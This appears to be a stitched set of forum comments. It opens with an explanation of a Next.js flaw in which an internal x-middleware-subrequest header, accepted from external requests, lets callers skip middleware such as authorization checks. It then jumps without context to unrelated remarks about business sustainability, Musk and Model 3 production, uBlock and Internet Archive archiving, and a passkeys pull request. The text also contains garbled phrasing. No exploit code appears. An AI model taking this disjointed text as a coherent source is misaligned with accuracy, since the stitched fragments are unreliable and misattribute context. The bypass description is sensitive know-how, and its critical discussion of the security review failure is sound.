> Next.js uses an internal header x-middleware-subrequest to prevent recursive requests from triggering infinite loops. The security report showed it was possible to skip running Middleware, which could allow requests to skip critical checks—such as authorization cookie validation—before reaching routes.
If I’m reading the code right, it support their hybrid model where your code can run in three places: the user’s browser, Vercel’s edge, and an actual server. It looks like the idea was for when code in the edge context to be able to call the server faster but it was not protected to keep anyone else from calling it directly.
If I he for that right, this is a security review failure since people perennially try that optimization and have it end poorly for reasons like this. It’s safer, and almost always less work, to treat all calls equally and optimize if needed rather than having to support an “internal” call type over the same interface.
As I understand it, the middleware runs before a request hits a page or API route.. so to avoid infinite loops from internal subrequests (URL rewrites, etc), Next.js tags them with the x-middleware-subrequest header. This tells the runtime to skip middleware for those requests and proceed directly to the target. Unfortunately this also works externally.
Sure, you can join something like that, too. That's not the important part. The important part is to get a sustainable business out of it. Just 5 years ago nobody believed this was doable.
5 years ago they weren’t there anymore. And Musk famously slept in the office and nearly went bankrupt and insane trying to ramp up production of model 3.
My bad, it wasn't visible until I disabled uBlock, requests seem to be caught by the "uBlock filters – Privacy" list. Does the IA actually run the JS and archive the fetched JSON on its own, or does it depend on someone visiting the archive page with their browser to trigger archival of this JSON data?
Yeah, this isn't new. I've been advocating for this since 2018[1], and the PR in question was submitted in November 2022.
The PR isn't dead though. There's some additional discussion[2] on its current state in the issue I linked above. Basically, it needs more people to test the implementation against different sites in the wild.
Hopefully the increasing popularity of passkeys will provide the necessary level of motivation and support to get this over the finish line.